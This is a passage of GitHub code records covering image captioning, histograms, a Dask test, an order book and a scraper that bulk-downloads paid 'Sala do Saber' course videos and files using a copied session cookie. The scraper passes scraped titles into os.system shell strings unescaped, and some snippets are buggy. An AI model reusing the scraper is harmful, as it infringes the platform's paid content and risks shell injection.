associated caption.\n\n Args:\n image (PIL.Image.Image or torch.Tensor): if tensor `(channels, height, width)`\n The image for which it evaluate the caption. \n \n vocabulary (Vocabulary): \n The vocabulary.\n\n Raises:\n ValueError: If the image is not a tensor or an image.\n \"\"\"\n # enforcing evaluation mode\n self.switch_mode(\"evaluation\")\n \n if isinstance(image, Image.Image):\n operations = transforms.Compose([\n transforms.Resize((MyDataset.image_trasformation_parameter[\"crop\"][\"size\"], MyDataset.image_trasformation_parameter[\"crop\"][\"size\"])), # Crops the given image at the center.\n transforms.ToTensor(),\n transforms.Normalize(mean=MyDataset.image_trasformation_parameter[\"mean\"], std=MyDataset.image_trasformation_parameter[\"std_dev\"])\n ])\n image = operations(image)\n \n if not(isinstance(image,torch.Tensor)): \n raise ValueError(f\"Image is not the expected type, got: {type(image)}.\")\n \n self.__generate_image_caption(image,vocabulary)\n \n self.switch_mode(\"training\")\n \n","repo_name":"gnekt/Image-Captioning-with-Python","sub_path":"NeuralModels/CaRNet.py","file_name":"CaRNet.py","file_ext":"py","file_size_in_byte":25294,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"81"} +{"seq_id":"6724084979","text":"from datetime import datetime\n\n\nclass TimeToGoHome:\n now = datetime.now().strftime(\"%H:%M\")\n homeTime = \"19:00\"\n\n @staticmethod\n def restar_hora(hora1, hora2):\n formato = \"%H:%M\"\n h1 = datetime.strptime(hora1, formato)\n h2 = datetime.strptime(hora2, formato)\n resultado = h1 - h2\n return str(resultado)\n\n if restar_hora(homeTime, now) < \"0\":\n print(\"Hora de irse a casa\")\n else:\n print(\"Para ir a casa falta: \", restar_hora(homeTime, now))\n","repo_name":"Rituzka/OB_Python_TimeHome","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"27681003243","text":"import cv2\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport streamlit as st\r\n#################################################################################################################\r\n\r\ndef rgb_to_gray(source: np.ndarray):\r\n gray = np.dot(source[..., :3], [0.299, 0.587, 0.114]).astype('uint8')\r\n return gray\r\n#################################################################################################################\r\n\r\n\r\ndef global_threshold(source: np.ndarray, threshold: int):\r\n # source: gray image\r\n src = np.copy(source)\r\n for x in range(src.shape[0]):\r\n for y in range(src.shape[1]):\r\n if src[x, y] > threshold:\r\n src[x, y] = 255\r\n else:\r\n src[x, y] = 0\r\n return src\r\n # src = np.copy(source)\r\n # if len(src.shape)> 2:\r\n # src = rgb_to_gray(source)\r\n # return (src > threshold).astype('int')\r\n#################################################################################################################\r\n\r\n\r\ndef local_threshold1(source: np.ndarray, divs: int):\r\n # source: gray image\r\n src = np.copy(source)\r\n for row in range(0, src.shape[0], divs):\r\n for col in range(0, src.shape[1], divs):\r\n mask_src = src[row:row+divs, col:col+divs]\r\n threshold = int(np.mean(mask_src))-10\r\n src[row:row+divs, col:col +\r\n divs] = global_threshold(source=mask_src, threshold=threshold)\r\n return 
src\r\n\r\n#################################################################################################################\r\n\r\n\r\ndef histogram(source: np.array, bins_num: int = 255):\r\n if bins_num == 2:\r\n new_data = source\r\n else:\r\n new_data = source.astype('uint8')\r\n bins = np.arange(0, bins_num)\r\n hist = np.bincount(new_data.ravel(), minlength=bins_num)\r\n return hist, bins\r\n\r\n#################################################################################################################\r\n\r\n\r\ndef equalize_histogram(source: np.ndarray, bins_num: int = 256):\r\n #\r\n bins = np.arange(0, bins_num)\r\n\r\n # Calculate the Occurrences of each pixel in the input\r\n hist_array = np.bincount(source.flatten(), minlength=bins_num)\r\n\r\n # Normalize Resulted array\r\n px_count = np.sum(hist_array)\r\n hist_array = hist_array / px_count\r\n\r\n # Calculate the Cumulative Sum\r\n hist_array = np.cumsum(hist_array)\r\n\r\n # Pixel Mapping\r\n trans_map = np.floor(255 * hist_array).astype('uint8')\r\n\r\n # Transform Mapping to Image\r\n img1d = list(source.flatten())\r\n map_img1d = [trans_map[px] for px in img1d]\r\n\r\n # Map Image to 2d & Reshape Image\r\n img_eq = np.reshape(np.asarray(map_img1d), source.shape)\r\n\r\n return img_eq, bins\r\n\r\n#################################################################################################################\r\n\r\n\r\ndef normalize_histogram(source: np.ndarray, bins_num: int = 256):\r\n mn = np.min(source)\r\n mx = np.max(source)\r\n norm = ((source - mn) * (256 / (mx - mn))).astype('uint8')\r\n hist, bins = histogram(norm, bins_num=bins_num)\r\n return norm, hist, bins\r\n\r\n#################################################################################################################\r\n\r\n\r\ndef draw_rgb_histogram(source: np.ndarray):\r\n\r\n colors = [\"red\", \"green\", \"blue\"]\r\n # colors = [(0, 0, 1),(0, 1, 0),(1, 0, 0)]\r\n figure, axis = plt.subplots()\r\n for i in range(source.shape[2]):\r\n hist, bins = histogram(source=source[:, :, i], bins_num=256)\r\n # plt.plot(bins, hist, color=colors[i])\r\n axis.plot(bins, hist, color=colors[i])\r\n axis.set_xlabel('color value')\r\n axis.set_ylabel('Pixel count')\r\n st.pyplot(figure)\r\n\r\n#################################################################################################################\r\n\r\n\r\ndef draw_gray_histogram(source: np.ndarray, bins_num):\r\n\r\n figure, axis = plt.subplots()\r\n # Create histogram and plot it\r\n hist, bins = histogram(source=source, bins_num=bins_num)\r\n axis.plot(bins, hist)\r\n axis.set_xlabel('gray value')\r\n axis.set_ylabel('Pixel count')\r\n st.pyplot(figure)\r\n\r\n#################################################################################################################\r\n\r\n\r\ndef display_bar_graph(x, height, width):\r\n figure, axis = plt.subplots()\r\n plt.bar(x, height, width)\r\n st.pyplot(figure)\r\n#################################################################################################################\r\ndef hist_bar(source: np.ndarray):\r\n figure, axis = plt.subplots()\r\n _ = plt.hist(source[:, :, 0].ravel(), bins = 256, color = 'red')\r\n _ = plt.hist(source[:, :, 1].ravel(), bins = 256, color = 'Green')\r\n _ = plt.hist(source[:, :, 2].ravel(), bins = 256, color = 'Blue')\r\n _ = plt.xlabel('Intensity Value')\r\n _ = plt.ylabel('Count')\r\n 
st.pyplot(figure)\r\n#################################################################################################################\r\n\r\ndef rgb_distribution_curve(source: np.ndarray):\r\n colors = [\"red\", \"green\", \"blue\"]\r\n figure, axis = plt.subplots()\r\n for i in range(source.shape[2]):\r\n hist, bins = histogram(source=source[:, :, i], bins_num=256)\r\n pdf = (hist) / sum(hist)\r\n cdf = np.cumsum(pdf)\r\n axis.plot(bins, cdf, label=\"CDF\", color=colors[i])\r\n st.pyplot(figure)\r\n#############################################################################################################","repo_name":"MariamTurky/Computer_Vision","sub_path":"Task_1/Histograms.py","file_name":"Histograms.py","file_ext":"py","file_size_in_byte":5548,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"41371343982","text":"# -*- coding: utf-8 -*-\n\n#########################################\n# File name: Sala do Saber Downlaoder #\n# Author: H4dar #\n# Orderer: Prince Andrews #\n# Description: Bot para realizar #\n# download dos videos e materias da #\n# plataforma SALA DO SABER, feito em #\n# Python, sob as libs de requests, para #\n# as duvidas que possam a vir, o codigo #\n# conta com diversos comentarios. #\n#########################################\n\nimport requests\nimport os\nimport json\nfrom bs4 import BeautifulSoup as bs\nimport urllib\nimport time\n\nsalasaber_session = requests.session() #Cria uma sessão para evitar multiplos requests\nclass Downloader(): #Unica classe e reponsavel por realizar todas as funções\n\n def index(self): #Nossa primeira def, utilizada apenas para passar as informações iniciais\n\n os.system('cls') \n ci_session = input('Cookies da Sessão: ')\n os.system('cls')\n\n salasaber_session.headers.clear()\n self.headers_auth = {\n 'authority': 'saladosaber.com.br',\n 'cache-control': 'max-age=0',\n 'upgrade-insecure-requests': '1',\n 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36',\n 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',\n 'sec-fetch-site': 'same-origin',\n 'sec-fetch-mode': 'navigate',\n 'sec-fetch-user': '?1',\n 'sec-fetch-dest': 'document',\n 'referer': 'https://saladosaber.com.br/auth',\n 'accept-language': 'pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7',\n 'cookie': f'ci_session={ci_session}; TawkConnectionTime=0'\n } #O Header que usaremos daqui para frente, cujo ele tem salvo sua SESSION\n salasaber_session.headers.update(self.headers_auth)\n classes_path = 'https://saladosaber.com.br/users/account' #Pagina que usaremos como base para iniciar a extração de dados\n classes_get = salasaber_session.get(classes_path, headers=self.headers_auth) # Converte a pagina para texto\n self.get_courses(classes_get.content) #Vamos iniciar a extração passando nosso texto para essa def\n \n\n def get_courses(self, classes_get): #Essa def recebe o HTML para iniciar as analises\n\n sdsaber_infos = bs(classes_get, 'html.parser') #Converte a pagina de texto para PURO HTML\n print('Sessão Autenticada\\n')\n courses_main = sdsaber_infos.find('ul', class_='list-unstyled categories')\n courses_list = courses_main.findAll('li', class_='item') #Procura pela lista de CURSOS\n for course in courses_list: #Tudo que segue aqui era ser repedito conforme o numero de CURSOS existentes na conta\n course_title = self.replacer(course.getText()) #Titulo do 
foco do Curso\n course_link = course.find('a')['href'] #Link do curso\n open_course = salasaber_session.get(course_link, headers=self.headers_auth).text #Para cada link detectado iremos entrar na pagina dele\n get_info = bs(open_course, 'html.parser') #Transformar o texto em HTML\n get_blocks = get_info.findAll(class_='col-12 mb-4') #Separamos em lista os blocos de cursos\n print(course_title)\n for info in get_blocks: #Será repedito até passar por todos os blocos de cursos\n title_group = info.find('h1', class_='title mb-4') \n title_group_text = self.replacer(title_group.getText()) #Titulo referente ao bloco\n print('\\t' + title_group_text) \n new_block = info.findAll('div', class_='item d-inline-block') #Indexamos em uma lista todos as materias que aparecem na pagina\n for new in new_block: #Será repetido em todas as materias dentro do bloco\n slick_list = new.find('a') \n new_title = self.replacer(slick_list.find(class_='img-fluid')['alt']) #Salvo o titulo da materia\n img_link = slick_list.find(class_='img-fluid')['src']\n slick_link = slick_list['href'] #O link da materia\n print(f'\\t\\t{new_title}') \n aulas = bs(salasaber_session.get(slick_link, headers=self.headers_auth).text, 'html.parser') #Acessa a materia e converte a pagina de texto para HTML\n list_aula = aulas.find('ul', class_='list-unstyled items')\n try:\n topic_aula = list_aula.findAll('li')\n except:\n continue #Listagem dos videos\n #print(topic_aula[0])\n #exit(0)\n fuller_path = \"Sala do Saber/\" + course_title + '/' + title_group_text + '/'+ new_title #Caminho qual será salvo nossos arquivos\n \n if os.path.exists(fuller_path) is False:\n os.makedirs(fuller_path) #Se as pastas não existe, ele cria.\n if os.path.exists(f'{fuller_path}/{new_title}.png') is False:\n urllib.request.urlretrieve(img_link, filename=f'{fuller_path}/{new_title}.png')\n print(f'\\t\\t{new_title} - IMG') \n \n for topic in topic_aula: #Iremos pegar as informações da pagina/aula\n \n #aula_link = topic.get('data-url')\n aula_link = topic['data-url']\n aula_title = self.replacer(topic.find('h1').getText().strip()) #Titulo da Aula\n if os.path.exists(f'{fuller_path}/{aula_title}.mp4'):\n continue\n \n \n topic_class = bs(salasaber_session.get(aula_link, headers=self.headers_auth).content, 'html.parser')\n #print(topic_class)\n if len(topic_class) == 0:\n print(f'\\t\\t\\t{aula_title} - Não baixada - Aula não encontrada - {aula_link}')\n continue\n try:\n source = topic_class.find('div', class_='lesson').find('input', {'name': 'video-source'})['value']\n except:\n continue\n #print(source)\n #m3u8_file = source.replace('m3u8', '_720.m3u8')\n \n self.vimeo_downloader(source, fuller_path, aula_title)\n #self.vimeo_downloader(vimeo_video, fuller_path, aula_title) #Def utilizada exclusivamente para baixar os videos\n self.download_files(topic_class, fuller_path, aula_title) #Def utilizada exclusivamente para baixar os arquivos\n try:\n #track = f'https://cdn.saladosaber.com.br/HLS/{vimeo_id}.hd/{vimeo_id}.hd.vtt'\n track = topic_class.find('div', class_='lesson').find('track')['src']\n if os.path.exists(f'{fuller_path}/{aula_title}.vtt') is False:\n os.system(f'aria2c -o \"{fuller_path}/{aula_title}.vtt\" \"{track}\" --quiet')\n #urllib.request.urlretrieve(track, filename=f'{fuller_path}/{aula_title}.vtt')\n print(f'\\t\\t\\t\\t{aula_title} - Legenda')\n except:\n #print(f'\\t\\t\\t\\t{aula_title} - Legenda jã baixada.')\n pass\n \n\n def vimeo_downloader(self, link, path, title): #Em resumo essa def baixa os videos da VIMEO na melhor qualidade 
possivel\n\n metodo = 'non'\n video_path = f'{path}/{title}.mp4'\n #https://cdn.saladosaber.com.br/HLS/370394426.hd/370394426.hd.m3u8\n #http://player.vimeo.com/video/370394426/config\n vimeo_link_id = link.split('/')[-1].split('.')[0]\n vimeo_video = f'http://player.vimeo.com/video/{vimeo_link_id}'\n try:\n if os.path.exists(video_path) is False:\n vimeo_headers = {\n 'Connection': 'keep-alive',\n 'Upgrade-Insecure-Requests': '1',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',\n 'Sec-Fetch-Site': 'cross-site',\n 'Sec-Fetch-Mode': 'navigate',\n 'Sec-Fetch-Dest': 'iframe',\n 'Referer': 'https://saladosaber.com.br',\n 'Accept-Language': 'pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7',\n }\n\n vimeo_config = requests.get(f'{vimeo_video}/config', headers=vimeo_headers).json()\n vimeo_download = sorted(vimeo_config[\"request\"][\"files\"][\"progressive\"], key = lambda i:i['height'])\n vimeo_url = vimeo_download[-1]['url']\n\n \n #os.system(f'''ffmpeg -i {vimeo_url} -nostats -loglevel 0 -bsf:a aac_adtstoasc -vcodec copy -c copy -crf 50 \"{video_path}\"''') \n os.system(f'aria2c -o \"{video_path}\" \"{vimeo_url}\" --quiet')\n metodo = 'Aria2c' \n except:\n pass\n if os.path.exists(video_path) is False:\n os.system(f'ffmpeg -i \"{link}\" \"{video_path}\" -preset ultrafast -nostats -loglevel 0')\n metodo = 'FFMPEG'\n print(f'\\t\\t\\t{title} - {metodo}')\n \n \n def download_files(self, text, path, aula_title): #Essa def é utilizada para baixarmos os arquivos disponibilizados pela plataforma\n\n file_path = f'{path}/Arquivos Disponiveis' #Nosso caminho de download\n files_video = text.find('div', class_='col-12 col-lg-3 lesson-files') \n files_video = files_video.find('ul', class_='list-unstyled').findAll('li') #Lista exclusiva dos arquivos de cada video separado, quando existir.\n #print(files_video)\n try: #Como não é sempre que pode existir, usamos um try\n files_content = text.find('div', class_='col-12 lesson-files')\n files_content = files_content.find('ul', class_='list-unstyled').findAll('li') #Indexar em lista todos os arquivos\n for files in files_content: #Repetir por todos os arquivos do video.\n file_link = files.find('a')['href'] #Link do arquivo\n file_title = self.replacer(files.find('a').getText().strip()) #Titulo do arquivo\n if os.path.exists(file_path) is False: #Verificador da Pasta ARQUIVOS GERAIS\n os.makedirs(file_path)\n if os.path.exists(f'{file_path}/{file_title}.pdf') is False:\n print('\\t\\t\\t' + file_title) #Essa parte verifica se o arquivo existe e faz o download na pasta indicada\n path_file = f'{file_path}/{file_title}.pdf'\n os.system(f'aria2c -o \"{path_file}\" \"{file_link}\" --quiet') \n #urllib.request.urlretrieve(file_link, filename=f'{file_path}/{file_title}.pdf')\n except:\n pass\n\n for files in files_video: #Repetir por todos os arquivos do video.\n file_link = files.find('a')['href']\n file_title = self.replacer(files.find('a').getText().strip())\n \n if os.path.exists(f'{file_path}/{aula_title}') is False:\n os.makedirs(f'{file_path}/{aula_title}')\n if os.path.exists(f'{file_path}/{aula_title}/{file_title}.pdf') is False:\n print('\\t\\t\\t\\t' + file_title) #Essa parte verifica se o arquivo existe e faz o download na pasta indicada\n #urllib.request.urlretrieve(file_link, filename=f'{file_path}/{aula_title}/{file_title}.pdf')\n 
path_file = f'{file_path}/{aula_title}/{file_title}.pdf'\n os.system(f'aria2c -o \"{path_file}\" \"{file_link}\" --quiet')\n \n def replacer(self, text): #Essa Def é responsavel unicicamente por tirar os caracteres incorretos para se ter um PATH\n invalid = {'.pdf': '', '..': '', r'\"': r\"'\", '\\\\': \" - \", '/': \"-\", '|': \" - \", '<': \"«\", '>': \"»\", '*': \"x\", ':': ' -', '?': \"¿\", '\\n': ' - '}\n for char in invalid:\n if char in text:\n text = text.replace(char, invalid[char])\n return text\n\n\"\"\"start = Downloader()\n\nprint('#####################')\nprint(' SALA DO SABER')\nprint('#####################\\n')\n\nstart.index()\"\"\" #Aqui que tudo inicia, chamando nossa classe de Downloader\n\n","repo_name":"FranciscoAlveJr/Bot_Telegram","sub_path":"Cursos/Sala_do_Saber_Downloader.py","file_name":"Sala_do_Saber_Downloader.py","file_ext":"py","file_size_in_byte":12821,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"69964321225","text":"# Simple script to test dask clutser\nimport dask.dataframe as dd\nimport os\nimport pandas as pd\n\nfrom calitp_data_infra.storage import get_fs\nfs = get_fs()\n\nRT_GCS = 'gs://calitp-analytics-data/data-analyses/rt_delay/compiled_cached_views/'\nDASK_GCS = 'gs://calitp-analytics-data/data-analyses/dask_test/'\n\nanalysis_date = \"2022-10-12\"\n\ndef categorize_time_of_day(value: int ) -> str:\n if isinstance(value, int):\n hour = value\n if hour < 4:\n return \"Owl\"\n elif hour < 7:\n return \"Early AM\"\n elif hour < 10:\n return \"AM Peak\"\n elif hour < 15:\n return \"Midday\"\n elif hour < 20:\n return \"PM Peak\"\n else:\n return \"Evening\"\n \n \ndef merge_stop_times_to_trips(stop_times: dd.DataFrame, \n trips: dd.DataFrame) -> dd.DataFrame: \n shape_id_cols = [\"calitp_itp_id\", \"shape_id\"]\n\n merged = dd.merge(\n stop_times,\n trips[shape_id_cols + [\"trip_id\"]].drop_duplicates(),\n on = [\"calitp_itp_id\", \"trip_id\"]\n )\n \n return merged\n\n\n\ndef aggregation_function(df: dd.DataFrame) -> dd.DataFrame:\n shape_id_cols = [\"calitp_itp_id\", \"shape_id\"]\n\n # Map to time-of-day\n stop_times_binned = df.assign(\n time_of_day=df.apply(\n lambda x: categorize_time_of_day(x.departure_hour), axis=1, \n #meta=('time_of_day', 'str')\n )\n )\n \n # Calculate the number of arrivals by time-of-day\n arrivals = (stop_times_binned.groupby(shape_id_cols + [\"time_of_day\"])\n .agg({\"stop_id\": \"count\"})\n .reset_index()\n )\n \n return arrivals\n\n\nif __name__==\"__main__\":\n from dask.distributed import Client\n\n client = Client(\"dask-scheduler.dask.svc.cluster.local:8786\")\n \n stop_times = dd.read_parquet(f\"{RT_GCS}st_{analysis_date}.parquet\")\n trips = dd.read_parquet(f\"{RT_GCS}trips_{analysis_date}.parquet\")\n \n merged = merge_stop_times_to_trips(stop_times, trips) \n merged = merged.repartition(npartitions=3)\n print(\"partitioned\")\n \n # Save to parquet\n merged.to_parquet(\n f\"{DASK_GCS}test\", \n storage_options={'token': fs.credentials.credentials}\n )\n print(\"save to GCS as partitioned\")\n\n df = dd.read_parquet(f\"{DASK_GCS}test\")\n print(\"read from GCS as partitioned\")\n \n df = df.map_partitions(aggregation_function, \n meta = {\n \"calitp_itp_id\": \"int\", \n \"shape_id\": \"str\",\n \"time_of_day\": \"str\",\n \"stop_id\": \"int\",\n }) # Be sure not to '.compute' here\n print(\"aggregation function\")\n\n df.compute().to_parquet(f'{DASK_GCS}preprocesed.parquet', \n storage_options={'token': fs.credentials.credentials}\n )\n 
print(\"saved preprocessed\")\n\n client.close()","repo_name":"cal-itp/data-analyses","sub_path":"starter_kit/simple_dask.py","file_name":"simple_dask.py","file_ext":"py","file_size_in_byte":2940,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"81"} +{"seq_id":"36444515005","text":"from libqtile.command import lazy\nfrom groups import ROWS, COLUMNS\nfrom libqtile.core.manager import Qtile\nfrom libqtile.hook import fire\nfrom libqtile import qtile as q\nfrom libqtile.log_utils import logger\n\n# from libqtile.command_client import InteractiveCommandClient\n\n\nclass Functions:\n @staticmethod\n def window_to_prev_group():\n @lazy.function\n def __inner(qtile):\n i = qtile.groups.index(qtile.current_group)\n\n if qtile.current_window and i != 0:\n group = qtile.groups[i - 1].name\n qtile.current_window.togroup(group, switch_group=True)\n\n return __inner\n\n @staticmethod\n def switch_focus(direction: int):\n @lazy.function\n def __inner(qtile: Qtile):\n group_i = qtile.current_group.name.split(\"-\")[0]\n windows = [\n w\n for w in qtile.windows_map.values()\n if w.group.name.split(\"-\")[0] == group_i\n ]\n # 0=left, 1=bottom, 2=top, 3=right\n current_focus = qtile.current_window\n if current_focus is None:\n current_focus = qtile.current_screen\n\n current_x, current_y = current_focus.x, current_focus.y\n target = None\n for w in windows:\n if w != current_focus:\n if (\n direction == 0\n # and w.y >= current_y\n and w.x < current_x\n and (target is None or w.x > target.x)\n ):\n target = w\n if (\n direction == 3\n # and w.y >= current_y\n and w.x > current_x\n and (target is None or w.x < target.x)\n ):\n target = w\n if (\n direction == 1\n and w.x >= current_x\n and w.y < current_y\n and (target is None or w.y > target.y)\n ):\n target = w\n if (\n direction == 2\n and w.x >= current_x\n and w.y > current_y\n and (target is None or w.y < target.y)\n ):\n target = w\n\n if target is not None:\n target.group.focus(target)\n qtile.focus_screen(target.group.screen.index)\n\n return __inner\n\n @staticmethod\n def move_window_to_screen(direction: int):\n @lazy.function\n def __inner(qtile: Qtile):\n so = int(qtile.current_group.name.split(\"-\")[1]) - 1\n i = int(qtile.current_group.name.split(\"-\")[0]) - 1\n\n # 0=left, 1=bottom, 2=top, 3=right\n current_focus = qtile.current_window\n current_x = qtile.current_screen.x\n target_screen = None\n if current_focus is not None:\n if direction == 0:\n for s in qtile.screens:\n if s.x < current_x and (\n target_screen is None or s.x > target_screen.x\n ):\n target_screen = s\n if direction == 3:\n for s in qtile.screens:\n if s.x > current_x and (\n target_screen is None or s.x < target_screen.x\n ):\n target_screen = s\n if target_screen is not None:\n target_group = (\n \"{0:0>2}\".format(i + 1)\n + \"-\"\n + \"{0:0>1}\".format(target_screen.index + 1)\n )\n current_focus.togroup(target_group)\n current_focus.group.focus(current_focus)\n qtile.focus_screen(current_focus.group.screen.index)\n\n return __inner\n\n screen_focus = [0 for s in range(ROWS * COLUMNS)]\n\n @staticmethod\n def span_groups():\n qtile = q\n if not hasattr(qtile, \"current_screen\"):\n return\n\n so = int(qtile.current_group.name.split(\"-\")[1]) - 1\n i = int(qtile.current_group.name.split(\"-\")[0]) - 1\n for s in range(len(qtile.screens)):\n target = [\n x\n for x in qtile.groups\n if x.name == \"{0:0>2}\".format(i + 1) + \"-\" + \"{0:0>1}\".format(s + 1)\n ]\n\n if len(target) > 0:\n qtile.screens[s].set_group(target[0], 
warp=False)\n\n # qtile.focus_screen(Functions.screen_focus[i])\n\n @staticmethod\n def screen_changed():\n qtile = q\n if not hasattr(qtile, \"current_screen\"):\n return\n\n so = int(qtile.current_group.name.split(\"-\")[1]) - 1\n i = int(qtile.current_group.name.split(\"-\")[0]) - 1\n # logger.warning(\"setting focused screen to \" + str(so))\n Functions.screen_focus[i] = so\n\n @staticmethod\n def focus_changed():\n qtile = q\n if not hasattr(qtile, \"current_window\") or not hasattr(\n qtile.current_window, \"name\"\n ):\n return\n # logger.warning(\"focus changed to \" + qtile.current_window.name)\n\n @staticmethod\n def switch_to_group_direction(direction: int, warp=False):\n @lazy.function\n def __inner(qtile: Qtile):\n so = int(qtile.current_group.name.split(\"-\")[1]) - 1\n i = int(qtile.current_group.name.split(\"-\")[0]) - 1\n # 0=left, 1=bottom, 2=top, 3=right\n current_row, current_column = i // COLUMNS, i % COLUMNS\n if direction == 0 or direction == 3:\n current_column += -1 if direction == 0 else 1\n current_column = (\n current_column + ROWS\n if current_column < 0\n else current_column % ROWS\n )\n current_column %= ROWS\n elif direction == 1 or direction == 2:\n current_row += -1 if direction == 2 else 1\n current_row = (\n current_row + COLUMNS if current_row < 0 else current_row % COLUMNS\n )\n new_index = current_row * COLUMNS + current_column\n target = [\n x\n for x in qtile.groups\n if x.name\n == \"{0:0>2}\".format(new_index + 1)\n + \"-\"\n + \"{0:0>1}\".format(Functions.screen_focus[new_index] + 1)\n ]\n\n if len(target) > 0:\n qtile.screens[Functions.screen_focus[new_index]].set_group(target[0])\n qtile.focus_screen(Functions.screen_focus[new_index])\n fire(\"changegroup\")\n\n return __inner\n\n @staticmethod\n def move_to_group_direction(direction: int):\n @lazy.function\n def __inner(qtile: Qtile):\n s = int(qtile.current_group.name.split(\"-\")[1]) - 1\n i = int(qtile.current_group.name.split(\"-\")[0]) - 1\n # 0=left, 1=bottom, 2=top, 3=right\n current_row, current_column = i // COLUMNS, i % COLUMNS\n if direction == 0 or direction == 3:\n current_column += -1 if direction == 0 else 1\n current_column = (\n current_column + ROWS\n if current_column < 0\n else current_column % ROWS\n )\n current_column %= ROWS\n elif direction == 1 or direction == 2:\n current_row += -1 if direction == 2 else 1\n current_row = (\n current_row + COLUMNS if current_row < 0 else current_row % COLUMNS\n )\n new_index = current_row * COLUMNS + current_column\n target = [\n x\n for x in qtile.groups\n if x.name\n == \"{0:0>2}\".format(new_index + 1) + \"-\" + \"{0:0>1}\".format(s + 1)\n ]\n\n if qtile.current_window and len(target) > 0:\n qtile.current_window.togroup(target[0].name, switch_group=True)\n fire(\"changegroup\")\n\n return __inner\n\n @staticmethod\n def window_to_next_group():\n @lazy.function\n def __inner(qtile):\n i = qtile.groups.index(qtile.current_group)\n\n if qtile.current_window and i != len(qtile.groups):\n group = qtile.groups[i + 1].name\n qtile.current_window.togroup(group, switch_group=True)\n\n return __inner\n\n ##### KILL ALL WINDOWS #####\n\n @staticmethod\n def kill_all_windows():\n @lazy.function\n def __inner(qtile):\n for window in qtile.current_group.windows:\n window.kill()\n\n return __inner\n\n @staticmethod\n def kill_all_windows_minus_current():\n @lazy.function\n def __inner(qtile):\n for window in qtile.current_group.windows:\n if window != qtile.current_window:\n window.kill()\n\n return __inner\n\n\nclass PWA:\n def __init__(self):\n 
pass\n\n @staticmethod\n def notion():\n return \"brave --profile-directory=Default --app=https://notion.so\"\n\n @staticmethod\n def music():\n return \"brave --profile-directory=Default --app=https://music.youtube.com/\"\n\n @staticmethod\n def spotify():\n return \"brave --profile-directory=Default --app=https://open.spotify.com/\"\n\n @staticmethod\n def youtube():\n return \"brave --user-data-dir=Default --app=https://www.youtube.com\"\n\n @staticmethod\n def calendar():\n return \"brave --profile-directory=Default --app=https://calendar.google.com/calendar/\"\n\n @staticmethod\n def habitica():\n return \"brave --profile-directory=Default --app=https://habitica.com/\"\n\n\nif __name__ == \"__main__\":\n print(\"This is an utilities module\")\n","repo_name":"ebeem/dotfiles","sub_path":".config/qtile/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":10080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"20069172285","text":"import pandas as pd\n\ndef p2p_orderbook():\n # Load bid and ask data into separate pandas dataframes:\n bid_data = get_rates()\n ask_data = get_rates()\n\n # Sort the bid and ask dataframes by price and quantity:\n bid_data = bid_data.sort_values(['price', 'quantity'], ascending=[True, False])\n ask_data = ask_data.sort_values(['price', 'quantity'], ascending=[False, False])\n\n # Group the bid and ask dataframes by price and aggregate the quantity:\n bid_data = bid_data.groupby('price').agg({'quantity': 'sum'}).reset_index()\n ask_data = ask_data.groupby('price').agg({'quantity': 'sum'}).reset_index()\n\n # Rename the columns and add a column for the total quantity:\n bid_data.columns = ['BidP', 'BidQ']\n bid_data['total_bid_quantity'] = bid_data['BidQ'].cumsum()\n\n ask_data.columns = ['AskP', 'AskQ']\n # ask_data['total_ask_quantity'] = -ask_data['AskQ'].cumsum()\n # Note that we added a negative sign to the total ask quantity column to indicate that it represents the cumulative sum of negative quantities\n\n # Merge the bid and ask dataframes:\n orderbook = pd.merge(bid_data, ask_data, how='outer', left_on='BidP', right_on='AskP')\n\n # Fill any missing values with zero:\n orderbook = orderbook.fillna(0)\n\n # Calculate the spread:\n orderbook['spread'] = orderbook['AskP'] - orderbook['BidP']\n\n # orderbook = orderbook[\n # ['total_bid_quantity', 'bid(quantity)', 'bid(price)', 'ask(price)', 'ask(quantity)', 'total_ask_quantity']]\n\n orderbook = orderbook[\n ['BidQ', 'BidP', 'AskP', 'AskQ', 'spread']]\n\n df = orderbook.to_string(index=False)\n return df","repo_name":"otliq/orderbook","sub_path":"orderbook.py","file_name":"orderbook.py","file_ext":"py","file_size_in_byte":1636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"22898334060","text":"import re\nfrom unidecode import unidecode\n\n\nclass RegexManager:\n _regex_patterns = {}\n\n def get_pattern(self, pattern_id):\n if _verbose:\n print(f\"get_pattern ( pattern_id: {pattern_id} )\")\n\n if pattern_id not in self._regex_patterns:\n self._regex_patterns[pattern_id] = re.compile(pattern_id)\n\n return self._regex_patterns[pattern_id]\n\n\n# def byte_size_to_human_size(byte_size, suffix=\"B\"):\n# if _verbose:\n# print(f\"byte_size_to_human_size ( byte_size: {byte_size} , suffix: {suffix} )\")\n#\n# for unit in ['', 'Ki', 'Mi', 'Gi', 'Ti', 'Pi', 'Ei', 'Zi']:\n# if abs(byte_size) < 1024.0:\n# return \"%3.1f%s%s\" % (byte_size, unit, byte_size)\n#\n# 
